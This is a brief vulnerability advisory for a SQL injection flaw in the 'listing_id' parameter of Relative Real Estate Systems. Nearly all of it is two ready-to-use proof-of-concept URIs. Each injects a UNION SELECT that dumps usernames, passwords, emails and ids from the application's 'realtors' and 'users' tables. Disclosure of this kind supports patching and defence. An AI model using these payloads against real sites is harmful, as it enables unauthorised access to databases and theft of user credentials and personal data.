Relative Real Estate Systems 'listing_id' Parameter SQL Injection Vulnerability

Relative Real Estate Systems 'listing_id' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/index.php?go=listings&listing_id=-30%20union%20select%201,2,3,4,5,6,7,8,concat(id,0x3a,username,0x3a,password,0x3a,email),0,1,2,3,4,5,6,7,8,9,0,1%20from%20realtors--
http://www.example.com/[path]/index.php?go=listings&listing_id=-30%20union%20select%201,2,3,4,5,6,7,8,concat(username,0x3a,password),0,1,2,3,4,5,6,7,8,9,0,1%20from%20users--